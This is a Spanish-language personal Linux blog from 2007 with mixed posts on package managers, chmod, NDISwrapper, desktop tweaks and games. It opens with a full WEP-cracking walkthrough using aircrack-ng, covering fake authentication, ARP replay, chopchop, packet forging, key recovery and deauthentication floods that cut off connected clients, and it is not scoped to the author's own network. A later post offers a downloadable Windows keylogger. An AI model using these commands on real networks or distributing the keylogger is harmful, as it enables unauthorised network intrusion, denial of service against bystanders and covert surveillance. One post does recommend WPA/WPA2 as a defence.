Ahora dejaremos nuestra wi-fi en modo Monitor:

airmon-ng start eth1

Buscaremos la mac de nuestro router:

airodump-ng -w wifi eth1

Una vez que tenemos la mac:

iwconfig eth1 mode Monitor channel #

# = canal de router

Ahora nos comunicaremos con el router:

aireplay-ng -1 0 -e “nombre de la red” -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 eth1

“Esto solo es necesario si no hay ningún cliente conectado al router”

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 eth1

xx:xx:xx:xx:xx:xx = mac del router

Estamos listos ahora a esperar unos minutos, cuando tengamos unas 150.000 ivs

aircrack-ng wifi-01.cap

Esperamos que nuestro amigo trabaje y en unos minutos jejeje tendremos la clave wep y nos podremos conectar.


aircrack-ng [opciones]


Los arichvo(s) de captura pueden estar en formato cap o ivs.
Aqui tenemos el aircrack-ng 0.6

ivstools

Esta es una utilidad muy buena ya q sirve para:


1º)unir archivos ivs en uno solo usamaos el siguiente comando:

Citar
ivstools --merge captura1.ivs captura2.ivs captura3.ivs archivofinal.ivs


siendo captura(s) los archivos q queremos unir y archivofinal el q nos generara como unión de los anteriores

2º)Para convertir un archivo con extensión cap en ivs:

Citar
ivstools --captura.cap archivofinal.ivs


makeivs

Es una utilidad q nos permite crear un archivo con extension ivs con la clave q nosostros le añadamos(es solo para hacer pruebas no sirve para nada mas)

Citar
makeivs.exe captura.ivs 866578388f517be0b4818a0db1

siendo captura el archivo inventado y 866578388f517be0b4818a0db1la clave inventada

Airmon-ng

Sirve para poner nuestra tarjeta en modo monitor antes de empezar a capturar trafico debemos poner nuestra tarjeta en modo monitor usando este script para ello tecleamos:

Citar
airmon-ng [canal]

start: para activar el modo monitor.
stop: para parar el modo monitor.
dispositivo: nuestra tarjeta (ath0, eth0, raw0.....)


Airodump-ng



Descripción

Se usa para capturar datos trasmitidos a traves del protocolo 802.11 y en particular para la captura y recoleccción de IVs (vectores iniciales) de los paquetes WEP con la intención de usar aircrack-ng. Si existe un receptor GPS conectado al ordenador airodump-ng muestra las condernadas del AP.


Uso

Antes de usarlo debes haber iniciado el script airmon-ng para que se muestren los dispositivos wireless que posees y para activar el modo monitor.Puedes, pero no se recomienda que ejecutes Kismet y airodump al mismo tiempo.


Citar
airodump-ng [opcione(s)]


OPCIONES:

--ivs: Captura solo ivs
--gpsd: Para usar un dispositivo Gps
--write :crea un archivo del nombre que le hallamos puestos y con las extensión(.cap ó .ivs)y empieza a capturar.
-w: es lo mismo que poner write
--beacons: Guarda los beacons, por defecto no los guarda.


Por defecto airodump captura todos los canales que se encuentren dentro de la frecuencia 2,4 Ghz.

--channel :Captura el canal especificado
--c: Lo mismo que escribir channel
-a: Captura en la frecuencia de 5Ghz especifica del canal a
--abg: Captura tanto en frecuencias de 2,4Ghz como en 5 Ghz



Para configurar correctamente los comandos debemos seguir el orden en el que estan esrcitos en este texto y omitir el comando que no deseemos modificar:

Ejemplos:

Citar
airodump-ng --ivs -w prueba -c 11 -abg ath0

capturaríra solo ivs creando un archivo llamado prueba en el canal 11 tanto en a/b/g

Citar
airodump-ng -w prueba -c 11 -abg ath0

capturaría creando un archivo cap llamado prueba en el canal 11 tanto en a/b/g



*Airodump oscila entre WEP y WPA.
Esto ocurre cuando tu controlador no desecha los paquetes corruptos (los que tienen CRC inválido). Si es un ipw2100 (Centrino b), simplemente no tiene arreglo; ve y compra una tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware.


*¿ Cuál es el significado de los campos mostrados por airodump ?

airodump-ng mostrará una lista con los puntos de acceso detectados, y también una lista de clientes conectados o estaciones ("stations").

Aireplay-ng

Se pueden realizar 5 ataques diferentes:

Ataque 0: Desautenticacion
Ataque 1: Autenticacion falsa
Ataque 2: Seleccion intereactiva del paquete a enviar
Ataque 3: Reinyección de petición ARP
Ataque 4: El "chopchop" de KoreK (predicción de CRC)


Ataque 0: Desautenticacion

Este ataque se puede utilizar para varios propositos:

*Capturar el WPA Handshake

Para ello debemos poner el siguiente comando

Citar
aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0

0 significa desautenticacion de cliente sirve para q se vuelva a sociar, vaciando de esta forma el cache y por lo tanto volviendo a enviar su handshake.

-a 00:13:10:30:24:9C Seria el AP

-c 00:09:5B:EB:C5:2B Seria una Station asociada a esa AP. Si omitimos esta ultima parte el ataque se realiza sobre todos las Station conectadas a ese AP.

ath0Es nuestra tarjeta segun los diversos modelos de tarjeta (chip) varia wlan0, eth0, ra0....

*Reinyeccion ARP

Citar
aireplay-ng -0 10 -a 00:13:10:30:24:9C ath0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0
como podemos observar el primer comando es una desautenticacion seguida de una reinyeccion de los paquetes obetenidos se supone que al haber vaciado la cahe del cliente y volverse a conectar vuleve a enviar la contraseña
-b 00:13:10:30:24:9C Seria el AP
-h 00:09:5B:EB:C5:2B Seria el cliente



*Denegacion del servicio a clientes conectados

Se vasa en el envio continuo de paquetes de desautenticacion con la consiguiente imposibilidad del cliente(s) de conectarse


Citar
aireplay-ng -0 0 -a 00:13:10:30:24:9C ath0

0hace que envie paquetes continuamente a culaquier Station conectado a ese AP si solo queremos uno en particular enviariamos con el comando
Citar
aireplay-ng -0 0 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0




Ataque 1: Autenticacion falsa


Este ataque es solamente exitoso cuando necesitamos un cliente asociado al AP para realizar los ataques 2, 3, 4 (-h opcion) y no lo tenemos.Por lo tamnto consiste en crear nosotros mismos un cliente q se asociara a ese AP.Hay que recordar llegando a este punto que simepre sera mejor un cliente verdadero ya que el falso no genera trafico ARP.

Se recomienda que antes de realizar este atque cambiemos nuetra direccion MAC de la tarjeta para que envie corectamente ACKs(peticiones).


Citar
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Una vez realizado esto lanzamos el ataque de la siguiente forma

Citar
aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

'the ssid' sin las comillas es el nombre del AP
00:11:22:33:44:55 Cliente falso


Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar paquetes estando en modo Infraestructura (la clave WEP en sí misma no importa, en tanto que el AP acepte autenticación abierta). Por lo que, en lugar de usar el ataque 1, puedes sólo asociarte e inyectar / monitorizar a través de la interfaz athXraw:

Citar
ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up

Citar
sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazará automáticamente ath0 por ath0raw):

Citar
aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0



Citar
aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Citar
Este ataque mencionado anteriormente hay muchas veces que falla y no es 100% seguro ya que ha sido probado por muchos de nosotros.El AP es cierto que escupe ivs pero hay veces que al intentar sacar la clave descubrimos que la clave es la introducida por nosotros por lo tanto no serviria de nada

Algunos puntos de acceso requieren de reautentificación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:

Citar
aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

si en vez de 30 segundos queremos 20 pues escribimos 20 si fuesen 10 modificamos por 10 y asi sucesivamente

Si este ataque parece fallar (aireplay permanece enviando paquetes de petición de autenticación), puede que esté siendo usado un filtrado de direcciones MAC. Asegúrate también de que:

Estás lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque también puede fallar.
El controlador está correctamente parcheado e instalado.
La tarjeta está configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, asegúrate de que el firmware está actualizado.




Ataque 2: Seleccion intereactiva del paquete a enviar


Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados más efectivos que el ataque 3 (reinyección automática de ARP).

Podrías usarlo, por ejemplo, para intentar el ataque "redifundir cualesquiera datos", el cuál sólo funciona si el AP realmente reencripta los paquetes de datos WEP:

Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

También puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptacas con WEP, cuyo tamaño es bien 68 o 86 bytes (dependiendo del sistema operativo):


Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

Citar
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0



Otra buena idea es capturar una cierta cantidad de trafico y echarle un ojo con etheral.Si creemos al examinar el trafico q hay dos paquetes q parecen una peticion y una respuesta(Un cliente envia un paquete y poco despues el destinatario responde a este) entonces es una buena idea intentar reinyectar el paquete peticion para obtener paquetes respuestas




Ataque 3: Reinyección de petición ARP

El clásico ataque de reinyección de petición ARP es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas o bien la dirección MAC de un cliente asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1 (00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso más, hasta que aparezca una petición ARP; este ataque fallará si no hay tráfico.

Por favor, fíjate en que también puedes reutilizar una petición ARP de una captura anterior usando el interruptor -r .


Citar
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...



El "chopchop" de KoreK (predicción de CRC)


Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela meramente el texto plano. De cualquier modo, la mayoría de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes.Si el AP tira paquetes menores de 42 bytes aireplay trata de adivinar el resto de la informacion q le falta, tan pronto como el encabezado se predecible.Si un paquete IP es capturado automaticamente busca el checksum del encabezado
despues de haber adivinado las partes que le faltaban.Este ataque requiere como minimo un paquete WEP (encriptado).


1. Primero, desencriptemos un paquete:


Citar
aireplay-ng -4 ath0


Si esto falla, es debido a que hay veces q el AP tira la informacion porque no sabe de que dirección MAC proviene. En estos casos debemos usar la direción MAC de un cliente que este conectado y que tenga permiso(filtrado MAC activado).


Citar
aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0



2. Echemos un vistazo a la dirección IP:

Citar
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1


3. Ahora, forjemos una petición ARP.


La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La dirección MAC inicial debe corresponder a una estación asociada.




Citar
arpforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap


4. Y reenviemos nuestra petición ARP forjada:


Citar
aireplay-ng -2 -r arp.cap ath0





Airedecap-ng

Sirve para desecriptar los paquetes capturados una vez optenida la clave ya sea WEP o WPA

airdecap-ng [opciones]





Ejemplos:

Citar
airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap
airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
airdecap-ng -e 'the ssid' -p passphrase tkip.cap

para conectar

iwconfig eth1 mode Managed key 00:11:22...

25 noviembre, 2007

Firmas en los Foros

hola bueno he notado en las firmas de varios foristas que ponen una URL y en ocaciones uno no tiene idea de a donde llegara esto tambien es para que se mire mas bonito Riendo a Carcajadas .

podemos crearle un vinculo de la siguiente manera

Código:
[url=pon-aqui-la-URL//]pon-aqui-el-titulo[/url]

21 noviembre, 2007

Gestor de paquetes SMART

En mandriva esta el rpmdrake o urpmi para instalar paquetes. si no es
de su total grado tenemos smart. lo he usado y la verdad me agrada mas.
--------------------------------------------------------
Instalacion

se instala con
urpmi smart

Podemos ir a la pagina de easy urpmi
escogemos la opcion de smart y se generaran automaticamente. si no estan ahi podemos hacerlo manualmente
para agregar repositorios de esta forma aqui dejo un ejemplo:


smart channel -y --add main type=urpmi
baseurl=ftp://ftp.ciril.fr/pub/linux/mandrakelinux/official/2008.0/i586/media/main/release hdlurl=media_info/hdlist.cz




------------------------------------------------
opcional
los de cooker preferi quitarlos

smart channel --remove-all
smart channel --remove cooker
smart channel --remove cooker-contrib
smart channel --remove cooker-non-free
----------------------------------------------
USO
en linea de comandos , es muy sencillo

smart search elpaquete busca el paquete que queremos
smart install elpaquete instala el paquete que queremos
smart update actualiza la lista de repositorios
smart upgrade actualiza nuestro sistema
smart --gui insterfaz grafica para smart
-----------------------------------------------
Comandos

Comandos de acción:

update
install
reinstall
upgrade
remove
check
fix
download
clean

Comandos de pregunta:
search
query
info
stats

Comandos de configuración:
channel
priority
mirror
flag

Ejecuta "smart comando --help" para más información.



Ejemplos:
smart install --help
smart install nombrepaquete
smart --gui
smart --gui install nombrepaquete
smart --shell


02 noviembre, 2007

StarCraft 1.15.1

aqui se los dejo la parte 1 y dos nadamas las descomprimen donde mismo y ya :P

1 rapidshit
2depositshit

y ya:P corran el scloader en cedega tanbien jala :P y ahy nos vemos

chmod

Para cambiar los permisos de un archivo o directorio del servidor, tienes que utilizar el comando chmod.

En general, cualquier comando de linux o unix tiene una ayuda, que puedes ver invocando al comando, seguido con el parámetro -help. Algo como esto:

chmod --help

Este comando en concreto tiene varias sintaxis permitidas. De entre ellas por ejemplo puedes utilizar:

chmod [opciones] modo-en-octal fichero

Las opciones podemos indicarlas o no, según queramos. Opciones típicas son:

  • -R para que mire también en los subdirectorios de la ruta.
  • - v para que muestre cada fichero procesado
  • - c es como -v, pero sólo avisa de los ficheros que modifica sus permisos

El modo en octal es un número en base 8 (octal) que especifique el permiso. Los números en octal se especifican empezando el número por un 0. Por ejemplo, 0777 es indica todos los permisos posibles para todos los tipos de usuario. 0666 indica que se dan permisos de lectura y escritura, pero no de ejecución. 0766 indica que se dan permisos de lectura y escritura, pero sólo tienen permiso de ejecución para los usuarios que son dueños del archivo. 0755 indica permisos para lectura y ejecución, pero escritura sólo para el usuario que es dueño del archivo.

Por ejemplo:

chmod 0777 archivo.txt
Asigna todos los permisos al archivo archivo.txt

chmod 0666 *
Asigna permisos de lectura y escritura, no de ejecución a todos los archivos y directorios del directorio donde ejecutamos el comando.

chmod -R 0644 *
Esto da permisos a todos los archivos y directorios del directorio donde se invoca el comando y de todos los directorios que cuelgan de él. Los permisos asignados son de lectura a todos los usuarios, de escritura sólo al dueño del archivo y de ejecución a nadie.

Otro modo de trabajo con chmod

Luego también se pueden asignar permisos de otra manera, utilizando otra posible sintaxis de chmod, que tal vez resulte más útil si no queremos tratar con los valores en octal.

chmod [opciones] modo[,modo]… fichero

Para ello tenemos que tener claros los distintos grupos de usuarios:
  • u: usuario dueño del fichero
  • g: grupo de usuarios del dueño del fichero
  • o: todos los otros usuarios
  • a: todos los tipos de usuario (dueño, grupo y otros)

También hay que saber la letra que abrevia cada tipo de permiso:
  • r: se refiere a los permisos de lectura
  • w: se refiere a los permisos de escritura
  • x: se refiere a los permisos de ejecución

Ejemplos

chmod o=rwx *
Asigna permisos de lectura, escritura y ejecución para los usuarios "otros" a todos los archivos de la carpeta

chmod a=rwx fichero.txt
Asigna todos los permisos a todos los usuarios para el archivo fichero.txt

chmod go= *
Quita todos los permisos para los usuario del grupo y los usuarios otros.

chmod u=rwx,g=rw,o= *
Da todos los permisos al dueño del fichero, a los del grupo del dueño le asigna permisos de lectura y escritura y a los otros usuarios les quita todos los permisos.

Nota:un espacio después de la coma "," en los distintos modos de permisos que se indiquen hace fallar el comando.

chmod a=r *
Da permisos únicamente de lectura a todos los tipos de usuario.

De un modo parecido a lo que acabamos de ver, también se pueden añadir o quitar permisos con los operadores + y -. Para ello se indica el tipo de usuario y el permiso que se resta o añade. Algo como esto:

chmod a-wrx *
Esto quita todos los permisos a todos los tipos de usuario.

chmod a+r,gu+w *
Este comando asigna permisos de lectura a todos los usuarios y permisos de escritura al dueño del archivo y el grupo del dueño.

chmod u=w,a+r *
Este comando asigna permisos de escritura al usuario dueño y a todos los usuarios les añade permiso de lectura.

07 octubre, 2007

Repositorios Mandriva

Un pequeño generador de repositorios para mandriva

para actualizar la base de datos de urpmi

urpmi.update -a

17 septiembre, 2007

Google Talk y Gaim (ahora pidgin)

Hola como estan pues para los que sepan pues bueno pero para los que no aqui se los dejo.

cuantos de ustedes usan Gmail? cuantos de ustedes usan el chat de gmail? pues pueden usar el gaim para entrar a chatear con sus contactos sin tener que entrar a gmail . usando gaim el procolo de jabber y google talk

Protocolo jabber
Nombre de Usario ( la cuenta de gmail sin la @)
servior gmail.com
recurso Gaim
contraseña ********

puerto 5222
conectar con el servidor talk.google.com


bueno esto es algo pequeño pero espero les sirva

24 agosto, 2007

quake 2

aqui les dejo este clasico y exelente juego =)
descargalo

22 agosto, 2007

Routers caseros

Hasta hace algún tiempo el que alguien tuviese el internet inalámbrico ya era un lujo, ahora es mas una necesidad. sin embargo con el avance de estas tecnologias pareciera que la seguridad queda por un lado, esto por que las claves WEP de algunos routers usando la suite aircrack pueden ser desencriptados facilmente, una clave wep de 128 bits ahora puede llegar ha ser crackeada en menos de 10 minutos. la red esta plagada de tutoriales sobre como hacerlo y no falta el chico lammer de secundaria que se cree "hacker" e intenta atacar a el que se ponga en su camino. aqui dejo un video educativo sobre este tema y usar otros tipos de encriptacion como el WPA o WPA2 , sinceramente yo ya no confio nada en ponerle a mi router una clave wep y en algunos casos ocultar el essid, filtrar MAC's y no usar encriptaciones de 64 bits xD, en fin es lo que se me ocurre por ahora. pero esto es un tema en el cual seguire buscando e informandome para lograr hacer mas segura la conexion y la encriptacion del router, al menos el de mi casa xD

pequeño keylogger de 130 kb

Aqui dejo una pequeña herramienta para hasefroch que encontre entre mis cd's de la preparatoria
Bajalo

20 agosto, 2007

Wifi-slax 3.0

esta esuna exelente distro basada en backtrack que a su vez basada de whax y auditor,

esta version incluye soporte d emodo monitor para nuevas tarjetas wireless

  • escoger entre grub y lilo
  • soporte inyección para chip wireless zydas
  • tiene el kernel 2.6.21
  • soporte de lectura y escritura en ntfs
  • Airoscript para facilitar la auditoria wireless
  • soporte para inyección para las tarjetas wireless centrino ipw3945 y otros chipset como rt73
  • aircrack 0.9 con soporte para la tecnica del aircrack-ptw (Crackeo de redes wifi mas rapido que con menos IV's obtienes el mismo resultado =) )
  • soporte para algunas nvidia
Descargatelo
MD5

08 agosto, 2007

Cajero automatico

genial lo que me faltaba creo que apesto mucho a linux por que este pin""#$ cajero de mie"!#$% se reinicio de la nada. hasta me preguntaron si mi tarjeta se había quedado ahi ahh no mames, al menos me hizo sonreír. tome un video es aburrido pero que esperaban? chicas y cerveza? xD

25 julio, 2007

Hax Puppy

Hax puppy es una distribucion creada para hacer auditorias de seguridad en redes =) y solo 50 megas instalable en USB

  • Suite Aircrack - versión 2.41 traducida por Uxio
  • WepAttack-0.1.3
  • Wlan_Decrypter 0.3
  • Macchanger - 1.5.0
  • Ethereal - 0.10.0a
  • Ettercap NG - 0.7.3
  • Kismet - 2005.08.R1
  • Tcpdump - 3.9.4
  • Nmap - 4.01
  • CCW 7 (modificado para adaptarlo a la distro)

drivers de tarjetas inalambricas
Una buena colección de drivers para tarjetas inalámbricas:


  • acx-20060215
  • ipw2100-1.2.1
  • ipw2200-1.1.0
  • ipw3945-1.1.0-pre2
  • islsm (sólo el módulo para usb)
  • linux-wlan-ng-0.2.3 (sólo el módulo para usb)
  • rt2400-cvs-2006050909
  • rt2500-1.1.0-b4
  • rt2570-1.1.0-b2
  • hostap-driver-0.4.7
  • madwifi-cvs-20051025
  • hostap-driver-0.4.7
  • prism54-svn-20050724
  • rtl8180-0.21
  • zd1201-0.14
  • zd1211-driver-r80

Bajate el torrent

Password:
seguridadwireless.net

22 julio, 2007

NDISwrapper instalar

web del proyecto de NDISwrapper

en realidad no sabia lo que era el NDISwrapper asi que les dejo esto que encontre en wikipedia

NdisWrapper es un envolvedor de drivers open source, que permite el uso de la mayoría de las tarjetas inalámbricas en Linux utilizando el kernel de Windows, APIs linqueando de forma dinámica el driver de Windows a esta implementación.

bueno yo tengo una tarjeta AIRLINK AWLC3026 , en una IBM thinkpad 770Z y debian sarge.

asi que comencemos con este pequeño tuto con el cual pude hacer funcionar mi targeta de red inalambrica

antes que nada necesitamos tener algunas cosas ya intaladas antes de comenzar a instalar el NDISwrapper la vercion que instale fue la 1.47. he notado en la red que hay muchos problemas con ndiswrapper muchos de los cuales no tengo idea de como resolver , aqui dejo el metodo que me funciono a mi =)

Prerequisitos

de los ultimos kernel 2.6.6.xx o 2.4.26.xx
linux-source
linux-headers
drivers (controladores) de windows de la tarjeta (usaremos el .inf) winxp en algunos casos win2000 , con drivers de win98 95 no se si funcione pero nada de pierde con provar.
gcc 3.4 (o superior. cuando lo intente compilar con una version mas antigua la 3.3 me marcaba error) para poder compilar la version 1.47 del ndiswrapper
paquete de pcmcia-cs (pcmcia card services for linux)
wireless-tools

Instalando Ndiswrapper

entramos a la pagina del Ndiswrapper descargamos el recurso y descomprimimos

tar -zxvf ndiswrapper-version.tar.gz

esto crea un directorio nos cambiamos a le y ejecutamos

make uninstall
make

como root
make install

Instalando el driver windows

al solo poner en la terminal
ndiswrapper

aparecen las opciones que tiene el mismo (-i -a -r -l -m -ma -mi -v . esta explicada cada una)

para instalar el driver usamos

ndiswrapper -i /rutadetudriver.inf

ahora provamos

ndiswrapper -l

y nos tiene que decir algo como

driver present, hardware present

ahora cargamos el ndiswrapper

modprobe ndiswrapper

abrimos
gedit /etc/modules

y al final agregamos
ndiswrapper

Buscando redes

scanear
iwlist wlan0 scan

conectar

# iwconfig wlan0 essid "mired"
# iwconfig wlan0 key XXXXXXXXXXXXXXXXXXXXXXXXXXX
# iwconfig wlan0 channel n

#dhclient

si tienen cosas para hacer esto mas completo :P

15 julio, 2007

mi "nueva" laptop xD



es una IBM thinkpad 770Z PII 366 MHz - RAM 128 MB - HD 8.1 GB - DVD - Mdm - Debian sarge! - 14.1" TFT XGA

me la vendio un amigo que a el ya no le servía. le actualice el BIOS y hazta el hasefroch equis pe me funciono en ella ( windows XP ) y la tengo con debian sarge la verdad jala bien para lo que es. en cuanto recien instale debian. me dio algunos problemas en cuando al video. ya que no se miraba toda la pantalla completa , edite el xfree86 y ahora la pantalla se ve bien. me daba (28-50 43-75) ahora le puse (55-75 30-83) y ahora se ve bien.

tiene un puerto infrarojo que aun no hago funcionar al igual que una targeta wireless que le compre. pero eso no me asusta hare que todo funcione en ella :P como no tengo internet con ella todavia ya despues subire una foto.

es una pc ya algo vieja y prove algunas distros con ella

pero debian le quedo bien aun que no es un debian nuevo pero es funcional =) veamos que sucede

ah si... pesa como 3 kilos xD

Quitar iconos en escritorio en Gnome

bueno acabo de adquirir una vieja pc IBM thinkpad 770Z. pentium 2, 366 mhz , 8 gb hdd, 130 megas en ram. le instale debian sarge. aqui ire dejando pequeños manuales de como la fui configurando.

una de las cuestiones fue de que no sabia como quitar iconos en el escritorio y la respuesta que encontre fue: abre una terminal y pon

gconf-editor


de ahi nos vamos a

/apps/nautilus/desktop

ahi estan las casillas solo tienes que desmarcarlas o marcarlas segun lo que quieras que se muestre.

tambien esta

apps/nautilus/preferences y show_desktop

con esto ya no tenemos iconos en el escritorio

08 julio, 2007

LanParty! (asi o mas frikis)

Hola. hace algunas semanas fui a una lanparty con mis amigos. (se que len esto y dicen ahhhhhh por que publicas esto... xD ) y nos artamos de jugar Starcraft durante 6 horas seguidas (0:00-06:00 xD ). siendo el mejor bernardo pero no es invencible eso lo hemos comprobado... jejeje poderosos battlecruiser jejeje :P

bueno si ustedes pueden hacerlo haganlo! la verdad es recomendable. yo me fui con mi ubuntu y cedega. otro amigo con mac osx y otros con windows. en estos casos la plataforma no importa! :D bueno aqui dejo las fotos y juzguen quien es el mas friki de todos nosotros... xD

un tux en mi ciudad

esto es algo curioso, en ocasiones cuando camino por las calles encuentro carteles pegados o stikers o calcomanías , grafitis etc. pero este me pareció genial :P

05 julio, 2007

Distro para pc antigüa

existen muchas distros que pueden funcionar en pc's antiguas . aqui quiero dejar algunas opciones para que prueven

http://www.livecdlist.com/?pick=All&showonly=Desktop&sort=Im ageSize&sm=0

en este enlace esta una gran cantidad y variedad. y diferentes funciones lo ideal es que donde dice minimo no te pase de 260 megas. existe vastante de donde escoger , muchas a pesar de ser pequeñas son robustas. muchas tambien instalables en USB . Bromeando

28 junio, 2007

Cursores de Starcraft!

hola. aqui les dejo esto. son unos cursores de starcraft los encotre en xfce look

copia el archivo index.theme a /home/tuusuario/.icons/default/
y copia la carpeta de Scraft /home/tuusuario/.icons/

reinicia las X y ahi lo tienes =)


26 junio, 2007

Phishing !

El dia de hoy me puse a revisar el correo basura. y mi sorpresa un correo de banamex (un banco comercial de aqui de mexico y no es la primera vez que pasa esto.) mandandome un correo diciendo que necesita actualizar datos sobre sus clientes ( yo ni tengo cuenta con ellos...)

ok siguamos el juego y ver que tiene esta web. es una falsificacion. si miran la URL . nota que esta pagina esta hospedada en un sitio ajeno a la institucion

inmediatamente sale una aviso en firefox diciendo que esta pagina tiene reporte de ser una falsificacion. esto es algo delicado ya que no me sorprendera el escuchar despues que alguien de sus datos y le cometan algun tipo de fraude Confundido aqui dejo esta.

quien mas conoce algun intento de phishing o que le allan querido tomar el pelo?

aqui dejo unas screenshots. y miren la URL de donde esta hospedada la pagina Confundido


23 junio, 2007

Paneles transparentes en xfce

tienes que modificar el archivo de xorg.conf
/etc/X11/xorg.conf

al final añade esto

Section "Extensions"
Option "Composite" "Enable"
EndSection

matas las X (control + alt + backspace)

y ahora mira las propiedades y te aparece algo como esto
tambien podemos ir a ajustes del gestor de ventanas a compositor y podemos jugar con lo que miremos ahi ... y obtener resultados como este:

Free Image Hosting at www.ImageShack.usFree Image Hosting at www.ImageShack.usFree Image Hosting at www.ImageShack.us

Configuraciones basicas Puppy linux

Anteriormente mencione como instalar el puppy linux en una USB. ahora veamos configuraciones basicas en el

segun el autor puppy puede correr en:

CPU : Pentium 166MMX o Pentium 200MMX
RAM : 128 MB RAM fisica para versiones desde version 1.0.2. Con menos de 128MB RAM se necesita un archivo 'swap' y/o una particion (unidad) swap Linux para que todos los programas incluidos funcionen; 64 MB RAM para versiones antes de version 1.0.264M
Disco Rígido : Ninguno
Lector de CD : 20x en adelante

para conectarnos a internet solo vamos a
start/setup/network wizard/interfaces (por defaul es eth0)/ auto DHCP decimos que guarde la configuracion y listo

los fondos de escritorio se encuentran en
/usr/share/backgrounds
aqui podemos pegar los fondos que queramos utilizar, para despues cambiarlo
start/Desktop/puppybackground desktop image

mas informacion sobre puppy aqui (algunas cosas en ingles)

otras distros de 50M (en proceso de pruevas xD)
Luit Linux
DSL
Austrumi
Feather
BBC-Linux

22 junio, 2007

opera , poniendolo como queremos

Primero descargamos opera http://www.opera.com/download/
hola aqui dejo como poner opera en español. instalarle el flash y java

Opera en español

copiamos este archivo ouw921_es-LA.lng ,

guardalo en /usr/share/opera/locale/

despues en opera ve a /tools/preferences/general/details/choose seleccionamos el de es-LA.ing y damos ok

ahora esta en español

Flash player

si lo tienes en tus repositorios intenta con
apt-get install flashplugin-nonfree

si no descargalo http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player_9_linux.tar.gz

Java

20 junio, 2007

¿Como demonios se dice?

unos dicen "lainux" otros "linux" pero como es? , aqui esta el mismo Linus trabalontes diciendolo:

Cedega seis punto cero =)

En la mula puedes conseguir muchas cosas interesantes que después puedes poner en rapidshit como esto. solo descomprime el contenido de cedega small en sus directorios (etc ,opt, usr , o al menos asi me salio en ubuntu) . correlo dale actualizacion local y listo. a jugar =)

Aqui lo consigues, ya dale click! ah que esperas deja de leerlo todo... que desesperante solo dale click!

19 junio, 2007

convertir a UTF-8 nuestro sistema de ficheros

yo tenia problemas con K3b que tengo algunos archivos con nombres que no me reconoce(�������) acentos, la letra "ñ" , y salen caracteres extraños y por lo tanto no podía grabar el cd.

Tenia que renombrar a mano cada archivo para poder hacerlo, para esto esta el convmv =)

nos deja convertir todo un directorio o de uno solo archivo . leer el manual
$ man convmv

por ejemplo si tenemos latin y queremos cambiar a UTF-8 entramos al directorio y ponemos

$ convmv -f latin1 -t utf-8 *

El convmv se ejecuta así en un modo de prueva, esto es que no hace los cambios por seguridad en nuestros ficheros, si estamos conformes con los cambios que realizara entonces ejecutamos
$ convmv --notest -f latin1 -t utf-8 *

ahora todos los subdirectorios de Musica de mi home

convmv -i -r -f ISO-8859-1 -t UTF-8 /home/neo/Musica/ --notest